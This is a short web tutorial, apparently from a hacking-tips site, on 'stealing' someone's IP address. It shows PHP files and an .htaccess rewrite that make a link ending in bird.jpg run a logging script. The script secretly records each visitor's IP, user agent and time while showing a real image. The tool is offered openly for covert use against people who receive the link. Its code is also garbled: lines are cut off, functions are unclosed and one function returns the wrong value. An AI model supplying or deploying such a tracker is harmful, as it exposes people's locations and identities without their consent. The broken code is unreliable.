Penetration TestingProtection

How to Steal IP Address via Image

Today we are going to steal someone’s IP Address by sending them an image URL, This guide is written for people who have hosting or their own VPS with a webserver running.

How to Steal IP Address via Image


Create a file name functions.php


<?php function getBrowser() { if (isset($_SERVER['HTTP_USER_AGENT']) && !empty($_SERVER['HTTP_USER_AGENT'])) { return $_SERVER['HTTP_USER_AGENT']; } else { return "Unknown User-Agent"; } }function getIP() {

if (function_exists('apache_request_headers')) {

$headers = apache_request_headers();

} else {

$headers = $_SERVER;


if ( array_key_exists( 'X-Forwarded-For', $headers ) && filter_var( $headers['X-Forwarded-For'], FILTER_VALIDATE_IP, FILTER$

return $headers['X-Forwarded-For'];

} elseif ( array_key_exists( 'HTTP_X_FORWARDED_FOR', $headers ) && filter_var( $headers['HTTP_X_FORWARDED_FOR'], FILTER_VAL$

return $headers['HTTP_X_FORWARDED_FOR'];

} else {




function getReferer() { if (isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['REMOTE_ADDR'])) { return $_SERVER['REMOTE_ADDR']; } else { return "Unknown Referer"; } } ?>


Create another file named log.php

<?php include 'functions.php';$browser = getBrowser();

$date    = date ('m/j/y g:i A');

$ip      = getIP();

$referer = getReferer();

$log     = fopen('logs.txt', 'a'); fwrite($log, '['.$date.'] '.$browser.'|'.$ip.'|'.$referer."rn"); fclose($log); echo '<img src="birdy.jpg">'; ?>


Create a file named .htaccess

Options All -Indexes

RewriteEngine on RewriteRule ^bird.jpg$ log.php

<Files *.txt> Order Deny,Allow Deny from all </Files>

<files ~ "^.*.([Hh][Tt][Aa])"> order allow,deny deny from all satisfy all </files>


Create an empty text file, and name it logs.txt

Create an empty text file, and rename it to bird.jpg

Upload a JPG file as birdy.jpg

Note: These can be named anything you want, this is just an example.

Anytime someone goes to bird.jpg on your server, it will load log.php, but the url will still show as bird.jpg

The log.php file will take the users information, save it to a text file, and display birdy.jpg, so that when we link the person, an actual image will still show.

No one will be able to access the logs.txt file. The only way to read it would be to log in to your host/vps and view it from there, so your logs are secured.

Note: The .htaccess file is essential for this to work. The htaccess file is also protected so that no one can view it. I suggest you test the script out yourself, and ensure you have your webserver properly setup to use .htaccess files, because I know some webservers and hosts do not have .htaccess files enabled by default. PM me if you need help setting this up.


Submit your Article/Tutorial? Click here

Related Articles

Back to top button